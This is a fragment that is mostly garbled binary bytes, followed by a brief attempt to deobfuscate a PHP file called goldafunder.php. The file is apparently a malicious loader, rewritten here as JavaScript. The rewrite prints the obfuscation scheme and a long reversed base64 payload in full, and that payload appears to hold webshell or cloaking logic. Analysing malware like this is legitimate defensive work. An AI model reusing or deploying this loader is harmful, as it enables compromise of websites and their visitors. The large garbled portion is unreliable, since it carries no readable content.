έοΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½@οΏ½οΏ½UοΏ½οΏ½οΏ½6οΏ½ΘΪΈοΏ½ΫΌΥοΏ½Ω΄οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+LοΏ½οΏ½οΏ½ΡοΏ½οΏ½οΏ½ά΅οΏ½οΏ½οΏ½Ω₯οΏ½οΏ½οΏ½Ρ+H6οΏ½οΏ½@οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½6οΏ½οΏ½οΏ½μοΏ½@οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½H6οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½XοΏ½οΏ½]οΏ½ΥοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+LοΏ½DοΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½YοΏ½YοΏ½οΏ½PοΏ½οΏ½οΏ½οΏ½+H6οΏ½ΘοΏ½οΏ½οΏ½DΪ«ΥοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ρ+H6οΏ½ΘΌοΏ½οΏ½οΏ½οΏ½Ϋ‘PΩ΅οΏ½οΏ½οΏ½οΏ½οΏ½DΝQοΏ½οΏ½οΏ½+H6οΏ½οΏ½οΏ½έοΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QΙΉ
άΎοΏ½οΏ½ οΏ½οΏ½οΏ½οΏ½
άΎοΏ½οΏ½@Ω·PοΏ½οΏ½ΡοΏ½οΏ½οΏ½οΏ½οΏ½@οΏ½οΏ½ΡοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½άοΏ½οΏ½ΥοΏ½οΏ½οΏ½οΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½Ϋ‘οΏ½6οΏ½ΧIWοΏ½UMUEYοΏ½οΏ½TοΏ½TοΏ½WοΏ½οΏ½οΏ½έοΏ½οΏ½DοΏ½οΏ½
T>AU οΏ½οΏ½IYI]}οΏ½οΏ½οΏ½οΏ½οΏ½ΡοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ϋ‘οΏ½6οΏ½μοΏ½ΩQοΏ½οΏ½DΜέοΏ½DοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½EοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½PΩ΅οΏ½6οΏ½οΏ½HοΏ½οΏ½ΥοΏ½έοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½}ΩPήοΏ½μοΏ½ ΫΫΌΡ+H6οΏ½+H7IοΏ½6οΏ½μοΏ½οΏ½οΏ½QέοΏ½οΏ½+H6οΏ½ά₯οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½QέοΏ½Θ¦HοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½|οΏ½οΏ½οΏ½οΏ½QοΏ½|οΏ½Ϊ οΏ½οΏ½X6οΏ½Κ οΏ½ΪοΏ½\οΏ½QοΏ½}ΩοΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½H6οΏ½οΏ½LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΘοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½\οΏ½οΏ½οΏ½UοΏ½+H6οΏ½οΏ½οΏ½QοΏ½}ΫοΏ½οΏ½οΏ½ΡοΏ½οΏ½Ϊ]οΏ½οΏ½οΏ½&οΏ½οΏ½HοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QέοΏ½Θ¦HοΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½|οΏ½ΪοΏ½οΏ½οΏ½HοΏ½οΏ½οΏ½οΏ½οΏ½ΪοΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½{άοΏ½
οΏ½οΏ½UοΏ½}ΥοΏ½Θ οΏ½οΏ½οΏ½οΏ½οΏ½ΪοΏ½]οΏ½YοΏ½οΏ½]ΨοΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½@οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+LοΏ½ΘοΏ½οΏ½οΏ½οΏ½οΏ½Ϋ@οΏ½οΏ½QοΏ½}ΫοΏ½οΏ½οΏ½Ρ&οΏ½+LοΏ½οΏ½οΏ½οΏ½οΏ½QέοΏ½Θ¦@οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½|οΏ½Ϊ οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½ΜΪοΏ½]οΏ½UΨQοΏ½οΏ½οΏ½οΏ½οΏ½ΥοΏ½οΏ½ΫX6οΏ½οΏ½DοΏ½+L οΏ½οΏ½οΏ½οΏ½οΏ½ΠοΏ½QοΏ½οΏ½έοΏ½
έD+@οΏ½οΏ½οΏ½Τ&οΏ½οΏ½ΜοΏ½]οΏ½οΏ½οΏ½οΏ½οΏ½Ϊ½MοΏ½οΏ½YΫ₯οΏ½ΜοΏ½οΏ½QοΏ½οΏ½ΤοΏ½οΏ½οΏ½Τ&οΏ½οΏ½ΔοΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½ΠοΏ½ΪΌοΏ½ΫάοΏ½YοΏ½οΏ½οΏ½Ψ§οΏ½&H7οΏ½οΏ½]οΏ½οΏ½UοΏ½οΏ½οΏ½έYοΏ½οΏ½EοΏ½οΏ½UοΏ½]οΏ½οΏ½άΣοΏ½οΏ½ΡοΏ½έοΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½ΪΊUοΏ½οΏ½]οΏ½&H7οΏ½οΏ½UοΏ½οΏ½ΙοΏ½οΏ½KοΏ½UοΏ½οΏ½]οΏ½οΏ½άοΏ½]οΏ½οΏ½οΏ½οΏ½ ΫΫΌΥοΏ½οΏ½οΏ½&H7οΏ½ΟοΏ½οΏ½QοΏ½οΏ½ΤοΏ½UοΏ½οΏ½QοΏ½οΏ½οΏ½ΪΌοΏ½ΩQΫοΏ½οΏ½οΏ½
έD+@οΏ½ ΫΫΌοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½ΩQΫοΏ½οΏ½οΏ½
έD+@
οΏ½YοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½QοΏ½}οΏ½οΏ½YοΏ½οΏ½οΏ½&οΏ½+D&οΏ½οΏ½@οΏ½οΏ½QοΏ½|ΫοΏ½οΏ½]οΏ½|οΏ½οΏ½οΏ½οΏ½οΏ½QέοΏ½οΏ½&οΏ½οΏ½TοΏ½οΏ½οΏ½οΏ½άοΏ½OοΏ½BοΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½ΚοΏ½οΏ½&οΏ½+LοΏ½οΏ½οΏ½οΏ½QοΏ½|οΏ½οΏ½}ΩοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+D+H6οΏ½οΏ½οΏ½ΡοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½&οΏ½οΏ½X6οΏ½Κ οΏ½οΏ½ήοΏ½οΏ½οΏ½οΏ½ΫΎQοΏ½οΏ½έ0οΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½&H6οΏ½ΚοΏ½οΏ½οΏ½ οΏ½οΏ½ήοΏ½οΏ½οΏ½οΏ½οΏ½X7EοΏ½+LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½οΏ½ΣοΏ½ΣοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½&H6οΏ½ΚοΏ½οΏ½οΏ½
ΨοΏ½οΏ½οΏ½UοΏ½+H6οΏ½οΏ½DοΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½@ΩΆοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΛοΏ½bUPKXοΏ½PοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½Ι οΏ½οΏ½X6οΏ½ΚοΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½LοΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½LοΏ½οΏ½οΏ½οΏ½οΏ½ΚοΏ½οΏ½&οΏ½οΏ½MIοΏ½οΏ½οΏ½οΏ½\οΏ½ΪοΏ½[οΏ½οΏ½οΏ½}ΩοΏ½YοΏ½QοΏ½~QοΏ½οΏ½]ΨοΏ½Qέ
άH6οΏ½Χ οΏ½οΏ½οΏ½]οΏ½YοΏ½οΏ½οΏ½οΏ½άοΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½έοΏ½ΥοΏ½οΏ½^οΏ½οΏ½έοΏ½οΏ½ οΏ½οΏ½ήοΏ½οΏ½&οΏ½οΏ½MIοΏ½οΏ½οΏ½οΏ½]οΏ½QοΏ½οΏ½έοΏ½οΏ½[οΏ½οΏ½οΏ½}ΩοΏ½YοΏ½QοΏ½~QοΏ½οΏ½]ΨοΏ½Ρ&οΏ½+LοΏ½ οΏ½ΤΨοΏ½οΏ½οΏ½έοΏ½ΥοΏ½οΏ½^οΏ½οΏ½έTΚ½οΏ½οΏ½οΏ½οΏ½]οΏ½έοΏ½ΥοΏ½οΏ½^οΏ½οΏ½έοΏ½οΏ½YΨοΏ½οΏ½οΏ½QοΏ½&οΏ½οΏ½MI$οΏ½U}TUTοΏ½IlοΏ½QXοΏ½QOοΏ½IοΏ½οΏ½οΏ½
T>AU!άIYI]}οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά@οΏ½οΏ½YάοΏ½+LοΏ½ΜοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΘΜοΏ½οΏ½οΏ½οΏ½ΪοΏ½οΏ½EοΏ½οΏ½οΏ½οΏ½DΟLοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½MI3οΏ½=SHWIYI]οΏ½οΏ½TοΏ½TοΏ½WοΏ½
οΏ½ΡοΏ½οΏ½οΏ½οΏ½\οΏ½οΏ½ΩοΏ½οΏ½+D&οΏ½οΏ½TοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½~QήΌοΏ½οΏ½}ΩοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+D+LοΏ½ΙοΏ½]οΏ½οΏ½]οΏ½}]οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΡοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½&οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½Ϋ°έοΏ½οΏ½έX6οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΩοΏ½[οΏ½]οΏ½οΏ½ΙοΏ½]οΏ½οΏ½]οΏ½}]οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ρ&οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½ΕοΏ½]οΏ½οΏ½οΏ½έοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+LοΏ½ ΫΥοΏ½]οΏ½οΏ½οΏ½οΏ½ SοΏ½I]WοΏ½UCοΏ½I]PοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά½οΏ½οΏ½οΏ½[οΏ½]οΏ½&οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½OοΏ½eοΏ½IYOοΏ½UCοΏ½I]PοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά½οΏ½οΏ½οΏ½[οΏ½]οΏ½&οΏ½οΏ½@οΏ½οΏ½οΏ½QeοΏ½IYOοΏ½UCοΏ½I]PοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά½οΏ½οΏ½οΏ½[οΏ½]οΏ½&οΏ½οΏ½@οΏ½οΏ½ΜοΏ½οΏ½WοΏ½6Q}T?TοΏ½οΏ½
οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½Υ+LοΏ½@Θ°οΏ½QοΏ½SοΏ½U8οΏ½UQY}T?TοΏ½οΏ½
οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½Υ+LοΏ½ οΏ½οΏ½οΏ½0οΏ½U}T?TοΏ½οΏ½
οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½Υ+LοΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½[οΏ½]Ψ@Θ Ρ&οΏ½οΏ½XοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΝΎIοΏ½οΏ½οΏ½οΏ½LοΏ½ΔοΏ½οΏ½LοΏ½ΗοΏ½οΏ½Ν½EοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½έοΏ½οΏ½οΏ½ΥοΏ½οΏ½3Q"οΏ½
οΏ½οΏ½ΜΉοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½ΡήοΏ½οΏ½Ϋ
οΏ½\οΏ½ΓοΏ½οΏ½οΏ½οΏ½8οΏ½οΏ½ΡοΏ½]οΏ½οΏ½οΏ½οΏ½οΏ½LΛοΏ½οΏ½οΏ½οΏ½4οΏ½οΏ½ΣοΏ½οΏ½YοΏ½οΏ½οΏ½έοΏ½οΏ½οΏ½QΙ‘ΩοΏ½YοΏ½QοΏ½~QοΏ½οΏ½]ΨοΏ½οΏ½οΏ½ΨΉYοΏ½+H6οΏ½+H7IοΏ½6οΏ½ΩQοΏ½οΏ½οΏ½οΏ½QέοΏ½οΏ½+@οΏ½οΏ½οΏ½+@οΏ½οΏ½οΏ½+D&οΏ½οΏ½DοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ι»HοΏ½οΏ½οΏ½ΣοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½HοΏ½οΏ½οΏ½ΨrQΩΌοΏ½οΏ½sΧ½οΏ½οΏ½οΏ½ΥοΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½ά@ΘΥοΏ½οΏ½&οΏ½μοΏ½ΠοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½&οΏ½οΏ½LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½sοΏ½άΘ‘AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½ΣοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½H6οΏ½οΏ½οΏ½ΟοΏ½οΏ½ ΫUοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+LοΏ½Ο€οΏ½ΪΊQοΏ½οΏ½οΏ½οΏ½οΏ½]ΫοΏ½οΏ½UοΏ½+DοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½6οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΥοΏ½οΏ½οΏ½ΙοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΜοΏ½οΏ½οΏ½LοΏ½οΏ½οΏ½οΏ½οΏ½ ΫUοΏ½οΏ½QοΏ½οΏ½AοΏ½οΏ½UοΏ½}ΥοΏ½ΘΈοΏ½οΏ½οΏ½οΏ½οΏ½ΥοΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½ά@ΘΥοΏ½οΏ½&οΏ½οΏ½LοΏ½ΣοΏ½οΏ½QοΏ½οΏ½οΏ½ΡοΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½D+LοΏ½οΏ½ΪΊQοΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½^οΏ½οΏ½άοΏ½οΏ½ΙοΏ½οΏ½&H6οΏ½Θ¦ΜοΏ½οΏ½οΏ½AοΏ½οΏ½οΏ½Θ₯οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΩοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½6οΏ½οΏ½DοΏ½οΏ½ΫUοΏ½οΏ½QοΏ½οΏ½ οΏ½οΏ½έοΏ½LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΣοΏ½οΏ½ΡοΏ½UοΏ½οΏ½AοΏ½&οΏ½+H7EοΏ½+LοΏ½οΏ½έΉUοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½UΪΉ]οΏ½οΏ½YοΏ½οΏ½QοΏ½οΏ½οΏ½ΣοΏ½οΏ½QοΏ½οΏ½οΏ½&οΏ½οΏ½M\οΏ½οΏ½οΏ½mοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΣοΏ½οΏ½QοΏ½οΏ½οΏ½&οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½MοΏ½οΏ½ΙοΏ½οΏ½οΏ½Ι£οΏ½οΏ½οΏ½ZοΏ½Ψ·οΏ½YοΏ½οΏ½ά οΏ½οΏ½X6οΏ½Κ’EοΏ½ΘΨ@οΏ½οΏ½ΫUοΏ½οΏ½QοΏ½&οΏ½+LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½MοΏ½οΏ½Ι’ΩYοΏ½}]οΏ½οΏ½ΧΩοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΨΉYοΏ½+H7IοΏ½6οΏ½ΨοΏ½οΏ½QέοΏ½οΏ½+LοΏ½οΏ½οΏ½οΏ½EJοΏ½AοΏ½οΏ½οΏ½οΏ½οΏ½έ½οΏ½οΏ½οΏ½ΛοΏ½TQRοΏ½οΏ½ZοΏ½οΏ½οΏ½vPοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½]οΏ½ΠοΏ½ΟοΏ½|URnQοΏ½οΏ½οΏ½οΏ½οΏ½Ϊ’οΏ½ΧΨοΏ½οΏ½οΏ½οΏ½οΏ½IHοΏ½AοΏ½οΏ½οΏ½ZοΏ½οΏ½οΏ½οΏ½οΏ½ά§TΨH6οΏ½οΏ½IYI]}οΏ½]?οΏ½}οΏ½PοΏ½QTUQKοΏ½IοΏ½MοΏ½οΏ½UοΏ½~UοΏ½ΘοΏ½TΪH6οΏ½οΏ½οΏ½AοΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½ΡοΏ½ΥοΏ½ΩΥοΏ½6οΏ½οΏ½@οΏ½οΏ½ΪΆQοΏ½}UοΏ½οΏ½οΏ½οΏ½]οΏ½+H4οΏ½οΏ½&οΏ½+D+D*οΏ½οΏ½οΏ½
I must now attempt to deobfuscate goldafunder.php
to bring meaning to the base64 encoded text.
After transforming the original php file into a somewhat javascript:
var randomText="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB"; var firstText=randomText[4] +randomText[45]+ randomText[30]+ randomText[24]+ randomText[21] +randomText[2] +randomText[11] +randomText[44] +randomText[24]+
randomText[52]+ randomText[57] +randomText[44]+randomText[24]; var secondText=randomText[30]+ randomText[53]+ randomText[20] +randomText[20]+ randomText[24] +randomText[41]; var thirdText=randomText[24]+
randomText[20] +randomText[20] + randomText[57]+
randomText[20]+ randomText[11]+randomText[20]+randomText[24]+ randomText[56] +randomText[57] +randomText[20]+ randomText[53] +randomText[39] +randomText[38]+ randomText[23]; var fourthText=randomText[52] +randomText[20]+
randomText[24] +randomText[45] + randomText[53] +randomText[24] +randomText[11]+ randomText[33] +randomText[35] + randomText[38]+ randomText[52]+ randomText[53]+randomText[39] +randomText[57]+randomText[38];thirdText(0); var fifthText=fourthText("",firstText(secondText("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